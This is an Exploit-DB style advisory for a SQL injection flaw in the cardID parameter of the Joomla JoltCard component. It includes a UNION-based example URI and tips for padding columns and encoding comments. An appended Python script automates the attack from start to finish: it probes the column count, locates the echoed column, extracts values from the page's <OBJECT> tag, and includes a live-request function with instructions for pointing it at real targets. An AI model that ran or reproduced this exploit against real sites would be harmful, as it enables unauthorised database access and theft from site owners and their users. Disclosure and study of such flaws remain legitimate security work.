Joomla! Component JoltCard 1.2.1 - SQL Injection

EDB-ID: 12269
Author: Valentin
Type: webapps
Platform: PHP
Published: 2010-04-16

# Exploit Title: Joomla Component com_joltcard SQL Injection Vulnerability
# Date: 17.04.2010
# Author: Valentin
# Category: webapps/0day
# Version: unknown
# Tested on: 
# CVE :  
# Code : 


[:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::]
|:: >> General Information 
|:: Advisory/Exploit Title = Joomla Component com_joltcard SQL Injection Vulnerability
|:: Author = Valentin Hoebel
|:: Contact = valentin@xenuser.org
|:: 
|:: 
[:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::]
|:: >> Product information
|:: Name = com_joltcard
|:: Vendor = JOLT media
|:: Vendor Website = http://jolt.ca/
|:: Affected Version(s) = unknown
|:: 
|:: 
[:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::]
|:: >> #1 Vulnerability
|:: Type = SQL Injection
|:: Vulnerable Parameter(s) = cardID
|:: Example URI = index.php?option=com_joltcard&Itemid=XX&task=view&cardID=X+AND+1=2+UNION+SELECT+concat(database())--
|:: The AND 1=2 suppresses the original row, so only the UNION row is rendered. The selected data
|:: is not shown as visible page text; it is only written into the HTML source, inside the <OBJECT>
|:: tag, so read the raw response rather than the rendered page.
|:: The UNION must return as many columns as the original query (pad with NULL until the
|:: column-count error disappears), and MySQL treats the trailing -- as a comment only when
|:: whitespace follows it, so send it URL-encoded as --+ .
|::
|:: 
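Worked example, added by the editor and not part of this advisory or of the JoltCard component: a Python script that builds the cardID payload from section 0x3, finds the column count and the echoed column by NULL-padding the UNION, and pulls the result out of the <OBJECT> tag using marker strings. The base URL, Itemid, the marker strings and the simulated response are constructed assumptions; simulated_fetch stands in for a live request and pretends the original query returns three columns with the first one copied into the <OBJECT> data attribute.

```python
"""Added example, not code from the advisory or from the JoltCard component.

Builds the cardID UNION payload from section 0x3, finds the column count and
the echoed column by NULL padding, and extracts the injected value from the
<OBJECT> tag.  Target URL, Itemid, marker strings and the simulated response
are all constructed for illustration.
"""
import re
import urllib.request
from urllib.parse import urlencode

# Markers bracketing the injected value, so extraction does not depend on
# which <OBJECT> attribute the component copies the selected column into.
START = "INJSTART"
END = "INJEND"


def marker_hex(s: str) -> str:
    """MySQL 0x... literal for s: no quotes, so it survives addslashes/magic_quotes."""
    return "0x" + s.encode().hex()


def build_payload(expr: str, column_count: int = 1, position: int = 0) -> str:
    """cardID value: false row filter, then a UNION with `expr` at `position`.

    Other columns are NULL (type-agnostic padding).  The comment is '-- ' with
    a trailing space: MySQL only treats '--' as a comment when whitespace
    follows, and urlencode turns that space into '+', i.e. '--+'.
    """
    cols = ["NULL"] * column_count
    cols[position] = f"concat({marker_hex(START)},{expr},{marker_hex(END)})"
    return f"1 AND 1=2 UNION SELECT {','.join(cols)}-- "


def build_url(base: str, itemid: int, payload: str) -> str:
    """Request URL for com_joltcard's view task with the injected cardID."""
    query = urlencode({"option": "com_joltcard", "Itemid": itemid,
                       "task": "view", "cardID": payload})
    return f"{base.rstrip('/')}/index.php?{query}"


OBJECT_RE = re.compile(r"<object\b.*?</object>", re.I | re.S)
VALUE_RE = re.compile(re.escape(START) + r"(.*?)" + re.escape(END), re.S)


def extract(html: str):
    """Injected value inside an <OBJECT> element, or None if the UNION did not
    land (column mismatch, SQL error, or the column is not echoed)."""
    for obj in OBJECT_RE.finditer(html):
        hit = VALUE_RE.search(obj.group(0))
        if hit:
            return hit.group(1)
    return None


def find_injection_point(fetch, base: str, itemid: int, max_cols: int = 20):
    """(column_count, echoed_position) for the first padded UNION whose marker
    comes back, or None.  Issues up to max_cols*(max_cols+1)/2 requests."""
    for n in range(1, max_cols + 1):
        for pos in range(n):
            html = fetch(build_url(base, itemid, build_payload("database()", n, pos)))
            if extract(html) is not None:
                return n, pos
    return None


def leak(fetch, base: str, itemid: int, expr: str):
    """Probe the injection point, then return the value of SQL expression `expr`."""
    point = find_injection_point(fetch, base, itemid)
    if point is None:
        return None
    n, pos = point
    return extract(fetch(build_url(base, itemid, build_payload(expr, n, pos))))


def http_fetch(url: str) -> str:
    """Live fetch for a real assessment (assumption: a plain GET suffices)."""
    with urllib.request.urlopen(url, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


# Constructed stand-in for the target (assumption: the original query returns
# three columns and the first one lands in the <OBJECT> data attribute).
SIMULATED_COLUMNS = 3


def simulated_fetch(url: str) -> str:
    columns = url.count("NULL") + 1  # NULL padding only comes from build_payload
    if columns != SIMULATED_COLUMNS or "SELECT+concat" not in url:
        return "<html><body>The used SELECT statements have a different number of columns</body></html>"
    echoed = START + "joomla_db" + END
    return (f'<html><body><OBJECT data="/cards/{echoed}.swf" '
            'type="application/x-shockwave-flash"></OBJECT></body></html>')


if __name__ == "__main__":
    print(leak(simulated_fetch, "http://example.invalid", 1, "database()"))
```

Against a live target replace simulated_fetch with http_fetch. If extract() returns None for every probe, either the column count exceeds max_cols, no column is echoed into the <OBJECT> tag, or the parameter is no longer injectable.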
[:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::]
|:: >> Additional Information
|:: Advisory/Exploit Published = 17.04.2010
|:: 
|:: 
[:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::]
|:: >> Misc
|:: Greetz && Thanks = inj3ct0r team, Exploit DB, hack0wn and ExpBase!
|::
|:: 
[:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]